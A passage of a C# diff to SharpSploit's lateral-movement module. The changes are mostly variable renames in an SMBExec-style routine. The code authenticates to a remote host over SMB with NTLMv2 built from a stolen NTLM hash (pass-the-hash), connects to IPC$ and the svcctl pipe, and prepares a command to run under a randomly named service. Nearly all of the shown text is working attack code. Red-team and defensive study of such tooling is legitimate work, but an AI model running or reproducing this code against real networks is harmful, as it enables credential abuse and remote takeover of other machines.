+                                    SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                    NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
+                                    SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
                                 }
-                                SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                 SMBClientStage = "exit";
                             }
                             break;
 
                     }
                 }
-                if (debug) { output.AppendLine(String.Format("Authenticating to {0}", target)); }
+                if (debug) { output.AppendLine(String.Format("Authenticating to {0}", Target)); }
                 string SMB_NTLSSP = BitConverter.ToString(SMBClientReceive);
                 SMB_NTLSSP = SMB_NTLSSP.Replace("-", "");
                 int SMB_NTLMSSP_Index = SMB_NTLSSP.IndexOf("4E544C4D53535000");
-                int SMB_NTLMSSP_bytes_index = SMB_NTLMSSP_Index / 2;
-                int SMB_domain_length = Utilities.DataLength(SMB_NTLMSSP_bytes_index + 12, SMBClientReceive);
-                int SMB_target_length = Utilities.DataLength(SMB_NTLMSSP_bytes_index + 40, SMBClientReceive);
-                SMB_session_ID = Utilities.GetByteRange(SMBClientReceive, 44, 51);
-                byte[] SMB_NTLM_challenge = Utilities.GetByteRange(SMBClientReceive, SMB_NTLMSSP_bytes_index + 24, SMB_NTLMSSP_bytes_index + 31);
-                byte[] SMB_target_details = null;
-                SMB_target_details = Utilities.GetByteRange(SMBClientReceive, (SMB_NTLMSSP_bytes_index + 56 + SMB_domain_length), (SMB_NTLMSSP_bytes_index + 55 + SMB_domain_length + SMB_target_length));
-                byte[] SMB_target_time_bytes = Utilities.GetByteRange(SMB_target_details, SMB_target_details.Length - 12, SMB_target_details.Length - 5);
+                int SMB_NTLMSSP_Bytes_Index = SMB_NTLMSSP_Index / 2;
+                int SMB_Domain_Length = Utilities.DataLength(SMB_NTLMSSP_Bytes_Index + 12, SMBClientReceive);
+                int SMB_Target_Length = Utilities.DataLength(SMB_NTLMSSP_Bytes_Index + 40, SMBClientReceive);
+                SMB_Session_ID = Utilities.GetByteRange(SMBClientReceive, 44, 51);
+                byte[] SMB_NTLM_challenge = Utilities.GetByteRange(SMBClientReceive, SMB_NTLMSSP_Bytes_Index + 24, SMB_NTLMSSP_Bytes_Index + 31);
+                byte[] SMB_Target_Details = null;
+                SMB_Target_Details = Utilities.GetByteRange(SMBClientReceive, (SMB_NTLMSSP_Bytes_Index + 56 + SMB_Domain_Length), (SMB_NTLMSSP_Bytes_Index + 55 + SMB_Domain_Length + SMB_Target_Length));
+                byte[] SMB_Target_Time_Bytes = Utilities.GetByteRange(SMB_Target_Details, SMB_Target_Details.Length - 12, SMB_Target_Details.Length - 5);
                 string hash2 = "";
                 for (int i = 0; i < hash.Length - 1; i += 2) { hash2 += (hash.Substring(i, 2) + "-"); };
                 byte[] NTLM_hash_bytes = (Utilities.ConvertStringToByteArray(hash.Replace("-", "")));
-                string[] hash_string_array = hash2.Split('-');
-                string auth_hostname = Environment.MachineName;
-                byte[] auth_hostname_bytes = Encoding.Unicode.GetBytes(auth_hostname);
-                byte[] auth_domain_bytes = Encoding.Unicode.GetBytes(domain);
-                byte[] auth_username_bytes = Encoding.Unicode.GetBytes(username);
-                byte[] auth_domain_length = BitConverter.GetBytes(auth_domain_bytes.Length);
-                auth_domain_length = new byte[] { auth_domain_length[0], auth_domain_length[1] };
-                byte[] auth_username_length = BitConverter.GetBytes(auth_username_bytes.Length);
-                auth_username_length = new byte[] { auth_username_length[0], auth_username_length[1] };
-                byte[] auth_hostname_length = BitConverter.GetBytes(auth_hostname_bytes.Length);
-                auth_hostname_length = new byte[] { auth_hostname_length[0], auth_hostname_length[1] };
-                byte[] auth_domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 };
-                byte[] auth_username_offset = BitConverter.GetBytes(auth_domain_bytes.Length + 64);
-                byte[] auth_hostname_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + 64);
-                byte[] auth_LM_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + 64);
-                byte[] auth_NTLM_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + 88);
+                //string[] hash_string_array = hash2.Split('-');
+                string Auth_Hostname = Environment.MachineName;
+                byte[] Auth_Hostname_Bytes = Encoding.Unicode.GetBytes(Auth_Hostname);
+                byte[] Auth_Domain_Bytes = Encoding.Unicode.GetBytes(domain);
+                byte[] Auth_Username_Bytes = Encoding.Unicode.GetBytes(username);
+                byte[] Auth_Domain_Length = BitConverter.GetBytes(Auth_Domain_Bytes.Length);
+                Auth_Domain_Length = new byte[] { Auth_Domain_Length[0], Auth_Domain_Length[1] };
+                byte[] Auth_Username_Length = BitConverter.GetBytes(Auth_Username_Bytes.Length);
+                Auth_Username_Length = new byte[] { Auth_Username_Length[0], Auth_Username_Length[1] };
+                byte[] Auth_Hostname_Length = BitConverter.GetBytes(Auth_Hostname_Bytes.Length);
+                Auth_Hostname_Length = new byte[] { Auth_Hostname_Length[0], Auth_Hostname_Length[1] };
+                byte[] Auth_Domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 };
+                byte[] Auth_Username_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + 64);
+                byte[] Auth_Hostname_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + 64);
+                byte[] Auth_LM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 64);
+                byte[] Auth_NTLM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 88);
                 HMACMD5 HMAC_MD5 = new HMACMD5();
                 HMAC_MD5.Key = NTLM_hash_bytes;
-                string username_and_target = username.ToUpper();
-                byte[] username_bytes = Encoding.Unicode.GetBytes(username_and_target);
-                byte[] username_and_target_bytes = username_bytes.Concat(auth_domain_bytes).ToArray();
-                byte[] NTLMv2_hash = HMAC_MD5.ComputeHash(username_and_target_bytes);
+                string Username_And_Target = username.ToUpper();
+                byte[] Username_Bytes = Encoding.Unicode.GetBytes(Username_And_Target);
+                byte[] Username_And_Target_bytes = Username_Bytes.Concat(Auth_Domain_Bytes).ToArray();
+                byte[] NTLMv2_hash = HMAC_MD5.ComputeHash(Username_And_Target_bytes);
                 Random r = new Random();
-                byte[] client_challenge_bytes = new byte[8];
-                r.NextBytes(client_challenge_bytes);
+                byte[] Client_Challenge_Bytes = new byte[8];
+                r.NextBytes(Client_Challenge_Bytes);
 
 
 
-                byte[] security_blob_bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
-                    .Concat(SMB_target_time_bytes)
-                    .Concat(client_challenge_bytes)
+                byte[] Security_Blob_Bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                    .Concat(SMB_Target_Time_Bytes)
+                    .Concat(Client_Challenge_Bytes)
                     .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
-                    .Concat(SMB_target_details)
+                    .Concat(SMB_Target_Details)
                     .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                byte[] server_challenge_and_security_blob_bytes = server_challenge_and_security_blob_bytes = SMB_NTLM_challenge.Concat(security_blob_bytes).ToArray();
+                byte[] Server_Challenge_And_Security_Blob_Bytes = Server_Challenge_And_Security_Blob_Bytes = SMB_NTLM_challenge.Concat(Security_Blob_Bytes).ToArray();
                 HMAC_MD5.Key = NTLMv2_hash;
-                byte[] NTLMv2_response = HMAC_MD5.ComputeHash(server_challenge_and_security_blob_bytes);
-                if (SMB_signing)
+                byte[] NTLMv2_Response = HMAC_MD5.ComputeHash(Server_Challenge_And_Security_Blob_Bytes);
+                if (SMB_Signing)
                 {
-                    byte[] session_base_key = HMAC_MD5.ComputeHash(NTLMv2_response);
-                    session_key = session_base_key;
+                    byte[] Session_Base_Key = HMAC_MD5.ComputeHash(NTLMv2_Response);
+                    Session_Key = Session_Base_Key;
                     HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                    HMAC_SHA256.Key = session_key;
+                    HMAC_SHA256.Key = Session_Key;
                 }
-                NTLMv2_response = NTLMv2_response.Concat(security_blob_bytes).ToArray();
-                byte[] NTLMv2_response_length = BitConverter.GetBytes(NTLMv2_response.Length);
-                NTLMv2_response_length = new byte[] { NTLMv2_response_length[0], NTLMv2_response_length[1] };
-                byte[] SMB_session_key_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + NTLMv2_response.Length + 88);
+                NTLMv2_Response = NTLMv2_Response.Concat(Security_Blob_Bytes).ToArray();
+                byte[] NTLMv2_Response_Length = BitConverter.GetBytes(NTLMv2_Response.Length);
+                NTLMv2_Response_Length = new byte[] { NTLMv2_Response_Length[0], NTLMv2_Response_Length[1] };
+                byte[] SMB_Session_Key_offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + NTLMv2_Response.Length + 88);
 
                 byte[] NTLMSSP_response = (new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 })
-                        .Concat(auth_LM_offset)
-                        .Concat(NTLMv2_response_length)
-                        .Concat(NTLMv2_response_length)
-                        .Concat(auth_NTLM_offset)
-                        .Concat(auth_domain_length)
-                        .Concat(auth_domain_length)
-                        .Concat(auth_domain_offset)
-                        .Concat(auth_username_length)
-                        .Concat(auth_username_length)
-                        .Concat(auth_username_offset)
-                        .Concat(auth_hostname_length)
-                        .Concat(auth_hostname_length)
-                        .Concat(auth_hostname_offset)
-                        .Concat(SMB_session_key_length)
-                        .Concat(SMB_session_key_length)
-                        .Concat(SMB_session_key_offset)
-                        .Concat(SMB_negotiate_flags)
-                        .Concat(auth_domain_bytes)
-                        .Concat(auth_username_bytes)
-                        .Concat(auth_hostname_bytes)
+                        .Concat(Auth_LM_Offset)
+                        .Concat(NTLMv2_Response_Length)
+                        .Concat(NTLMv2_Response_Length)
+                        .Concat(Auth_NTLM_Offset)
+                        .Concat(Auth_Domain_Length)
+                        .Concat(Auth_Domain_Length)
+                        .Concat(Auth_Domain_offset)
+                        .Concat(Auth_Username_Length)
+                        .Concat(Auth_Username_Length)
+                        .Concat(Auth_Username_Offset)
+                        .Concat(Auth_Hostname_Length)
+                        .Concat(Auth_Hostname_Length)
+                        .Concat(Auth_Hostname_Offset)
+                        .Concat(SMB_Session_Key_Length)
+                        .Concat(SMB_Session_Key_Length)
+                        .Concat(SMB_Session_Key_offset)
+                        .Concat(SMB_Negotiate_Flags)
+                        .Concat(Auth_Domain_Bytes)
+                        .Concat(Auth_Username_Bytes)
+                        .Concat(Auth_Hostname_Bytes)
                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
-                        .Concat(NTLMv2_response).ToArray();
+                        .Concat(NTLMv2_Response).ToArray();
                 if (ForceSMB1)
                 {
-                    packet_SMB_header = new OrderedDictionary();
-                    SMB_user_ID = new byte[] { SMBClientReceive[32], SMBClientReceive[33] };
-                    packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x73 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0xff, 0xff }, process_ID_Bytes, new byte[] { 0x00, 0x00 });
+                    Packet_SMB_Header = new OrderedDictionary();
+                    SMB_User_ID = new byte[] { SMBClientReceive[32], SMBClientReceive[33] };
+                    Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x73 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, new byte[] { 0x00, 0x00 });
 
-                    if (SMB_signing)
+                    if (SMB_Signing)
                     {
-                        packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                        Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                     }
 
-                    packet_SMB_header["SMBHeader_UserID"] = SMB_user_ID;
-                    OrderedDictionary packet_NTLMSSP_negotiate = SMBExec.NTLMSSPAuth(NTLMSSP_response);
-                    byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                    byte[] NTLMSSP_negotiate = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_negotiate);
-                    OrderedDictionary packet_SMB_data = SMBExec.SMBSessionSetupAndXRequest(NTLMSSP_negotiate);
-                    byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                    OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
-                    byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                    SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
+                    Packet_SMB_Header["SMBHeader_UserID"] = SMB_User_ID;
+                    Packet_NTLMSSP_Negotiate = SMBExec.NTLMSSPAuth(NTLMSSP_response);
+                    SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                    NTLMSSP_Negotiate = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Negotiate);
+                    Packet_SMB_Data = SMBExec.SMBSessionSetupAndXRequest(NTLMSSP_Negotiate);
+                    SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                    NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
+
+                    SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
                 }
                 else
                 {
-                    SMB2_message_ID += 1;
-                    packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x01, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                    OrderedDictionary packet_NTLMSSP_auth = SMBExec.NTLMSSPAuth(NTLMSSP_response);
-                    byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                    byte[] NTLMSSP_auth = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_auth);
-                    OrderedDictionary packet_SMB2_data = SMBExec.SMB2SessionSetupRequest(NTLMSSP_auth);
-                    byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                    OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
-                    byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                    SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
+                    SMB2_Message_ID += 1;
+                    Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x01, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                    Packet_NTLMSSP_Auth = SMBExec.NTLMSSPAuth(NTLMSSP_response);
+                    SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                    NTLMSSP_Auth = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Auth);
+                    Packet_SMB2_Data = SMBExec.SMB2SessionSetupRequest(NTLMSSP_Auth);
+                    SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                    NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
+                    SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
                 }
 
 
 
-                SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
 
                 if (ForceSMB1)
                 {
                     if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 9, 12)) == "00-00-00-00")
                     {
                         if (debug) { output.AppendLine("Authentication Successful"); }
-                        login_successful = true;
+                        Login_Successful = true;
                     }
                     else
                     {
-                        output.AppendLine("Unable to authenticate to target.");
+                        output.AppendLine("Unable to authenticate to Target.");
                         return output.ToString();
                     }
                 }
@@ -1385,55 +1388,56 @@ namespace SharpSploit.LateralMovement
                     if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) == "00-00-00-00")
                     {
                         if (debug) { output.AppendLine("Authentication Successful"); }
-                        login_successful = true;
+                        Login_Successful = true;
                     }
                     else
                     {
-                        output.AppendLine("Unable to Authenticate to target.");
+                        output.AppendLine("Unable to Authenticate to Target.");
                         return output.ToString();
                     }
                 }
 
-                if (debug) { output.AppendLine(String.Format("Login Status: {0}", login_successful)); }
-                if (login_successful)
+                if (debug) { output.AppendLine(String.Format("Login Status: {0}", Login_Successful)); }
+                if (Login_Successful)
                 {
-                    byte[] SMBExec_command;
-                    byte[] SMB_path_bytes;
-                    string SMB_Path = "\\\\" + target + "\\IPC$";
+                    byte[] SMBExec_Command;
+                    byte[] SMB_Path_Bytes;
+                    string SMB_Path = "\\\\" + Target + "\\IPC$";
+                    
                     if (ForceSMB1)
                     {
-                        SMB_path_bytes = Encoding.UTF8.GetBytes(SMB_Path).Concat(new byte[] { 0x00 }).ToArray();
+                        SMB_Path_Bytes = Encoding.UTF8.GetBytes(SMB_Path).Concat(new byte[] { 0x00 }).ToArray();
                     }
                     else
                     {
-                        SMB_path_bytes = Encoding.Unicode.GetBytes(SMB_Path);
+                        SMB_Path_Bytes = Encoding.Unicode.GetBytes(SMB_Path);
                     }
 
                     byte[] SMB_named_pipe_UUID = { 0x81, 0xbb, 0x7a, 0x36, 0x44, 0x98, 0xf1, 0x35, 0xad, 0x32, 0x98, 0xf0, 0x38, 0x00, 0x10, 0x03 };
-                    byte[] SMB_service_bytes;
-                    string SMB_service = null;
+                    byte[] SMB_Service_bytes;
+                    string SMB_Service = null;
                     if (string.IsNullOrEmpty(ServiceName))
                     {
                         const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
                         var rand = new Random();
-                        SMB_service = new string(Enumerable.Repeat(chars, 20).Select(s => s[rand.Next(s.Length)]).ToArray());
-                        SMB_service_bytes = Encoding.Unicode.GetBytes(SMB_service).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                        SMB_Service = new string(Enumerable.Repeat(chars, 20).Select(s => s[rand.Next(s.Length)]).ToArray());
+                        SMB_Service_bytes = Encoding.Unicode.GetBytes(SMB_Service).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                     }
                     else
                     {
-                        SMB_service = ServiceName;
-                        SMB_service_bytes = Encoding.Unicode.GetBytes(SMB_service);
-                        if (Convert.ToBoolean(SMB_service.Length % 2))
+                        SMB_Service = ServiceName;
+                        SMB_Service_bytes = Encoding.Unicode.GetBytes(SMB_Service);
+                        if (Convert.ToBoolean(SMB_Service.Length % 2))
                         {
-                            SMB_service_bytes = SMB_service_bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
+                            SMB_Service_bytes = SMB_Service_bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
                         }
                         else
                         {
-                            SMB_service_bytes = SMB_service_bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                            SMB_Service_bytes = SMB_Service_bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                         }
                     }
-                    if (debug) { output.AppendLine(String.Format("Service Name is {0}", SMB_service)); }
-                    byte[] SMB_service_length = BitConverter.GetBytes(SMB_service.Length + 1);
+                    if (debug) { output.AppendLine(String.Format("Service Name is {0}", SMB_Service)); }
+                    byte[] SMB_Service_Length = BitConverter.GetBytes(SMB_Service.Length + 1);
 
                     if (ComSpec)
                     {
@@ -1443,97 +1447,93 @@ namespace SharpSploit.LateralMovement
                     }
 
                     byte[] commandBytes = Encoding.UTF8.GetBytes(command);
-                    List<byte> SMBExec_command_list = new List<byte>();
+                    List<byte> SMBExec_Command_List = new List<byte>();
                     foreach (byte commandByte in commandBytes)
                     {
-                        SMBExec_command_list.Add(commandByte);
-                        SMBExec_command_list.Add(0x00);
+                        SMBExec_Command_List.Add(commandByte);
+                        SMBExec_Command_List.Add(0x00);
 
                     }
-                    byte[] SMBExec_command_init = SMBExec_command_list.ToArray();
+                    byte[] SMBExec_Command_Init = SMBExec_Command_List.ToArray();
 
                     if (Convert.ToBoolean(command.Length % 2))
                     {
-                        SMBExec_command = SMBExec_command_init.Concat(new byte[] { 0x00, 0x00 }).ToArray();
+                        SMBExec_Command = SMBExec_Command_Init.Concat(new byte[] { 0x00, 0x00 }).ToArray();
                     }
                     else
                     {
-                        SMBExec_command = SMBExec_command_init.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                        SMBExec_Command = SMBExec_Command_Init.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                     }
-                    byte[] SMBExec_command_length_bytes = BitConverter.GetBytes(SMBExec_command.Length / 2);
-                    int SMB_split_index = 4256;
-                    int SMB_signing_counter = 0;
-                    byte[] SMB_tree_ID = new byte[2];
-                    string SMB_client_stage_next = "";
+                    byte[] SMBExec_Command_Length_bytes = BitConverter.GetBytes(SMBExec_Command.Length / 2);
+                    int SMB_Split_Index = 4256;
+                    int SMB_Signing_Counter = 0;
+                    byte[] SMB_Tree_ID = new byte[2];
+                    string SMB_Client_Stage_Next = "";
                     if (ForceSMB1)
                     {
                         SMBClientStage = "TreeConnectAndXRequest";
-                        while (SMBClientStage != "exit" && SMBExec_failed == false)
+                        while (SMBClientStage != "exit" && SMBExec_Failed == false)
                         {
                             if (debug) { output.AppendLine(String.Format("Current Stage {0}", SMBClientStage)); }
                             switch (SMBClientStage)
                             {
                                 case "TreeConnectAndXRequest":
                                     {
-                                        packet_SMB_header = new OrderedDictionary();
-                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x75 }, new byte[] { 0x18 }, new byte[] { 0x01, 0x48 }, new byte[] { 0xff, 0xff }, process_ID_Bytes, SMB_user_ID);
-                                        if (SMB_signing)
+                                        Packet_SMB_Header = new OrderedDictionary();
+                                        Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x75 }, new byte[] { 0x18 }, new byte[] { 0x01, 0x48 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, SMB_User_ID);
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                            SMB_signing_counter = 2;
-                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_Signing_Counter = 2;
+                                            SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
-                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                        OrderedDictionary packet_SMB_data = SMBExec.SMBTreeConnectAndXRequest(SMB_path_bytes);
-                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                        OrderedDictionary packet_NetBIOS_Session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
-                                        byte[] NetBIOS_Session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_Session_service);
+                                        SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                        Packet_SMB_Data = SMBExec.SMBTreeConnectAndXRequest(SMB_Path_Bytes);
+                                        SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
 
-                                        if (SMB_signing)
+                                        if (SMB_Signing)
                                         {
-                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).ToArray();
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
-                                            byte[] SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature2;
-                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
+                                            SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature2;
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                         }
 
-                                        SMB_client_send = NetBIOS_Session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "CreateAndXRequest";
                                     }
                                     break;
                                 case "CreateAndXRequest":
                                     {
-                                        SMB_named_pipe_bytes = new byte[] { 0x5c, 0x73, 0x76, 0x63, 0x63, 0x74, 0x6c, 0x00 }; //svcctl
-                                        SMB_tree_ID = Utilities.GetByteRange(SMBClientReceive, 28, 29);
-                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0xa2 }, new byte[] { 0x18 }, new byte[] { 0x02, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
-                                        if (SMB_signing)
+                                        SMB_Named_Pipe_Bytes = new byte[] { 0x5c, 0x73, 0x76, 0x63, 0x63, 0x74, 0x6c, 0x00 }; //svcctl
+                                        SMB_Tree_ID = Utilities.GetByteRange(SMBClientReceive, 28, 29);
+                                        Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0xa2 }, new byte[] { 0x18 }, new byte[] { 0x02, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                            SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_Signing_Counter += 2;
+                                            SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
-                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                        OrderedDictionary packet_SMB_data = SMBExec.SMBNTCreateAndXRequest(SMB_named_pipe_bytes);
-                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                        OrderedDictionary packet_NetBIOS_Session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
-                                        byte[] NetBIOS_Session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_Session_service);
+                                        SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                        Packet_SMB_Data = SMBExec.SMBNTCreateAndXRequest(SMB_Named_Pipe_Bytes);
+                                        SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
 
-                                        if (SMB_signing)
+                                        if (SMB_Signing)
                                         {
-                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).ToArray();
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
-                                            byte[] SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature2;
-                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
+                                            SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature2;
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                         }
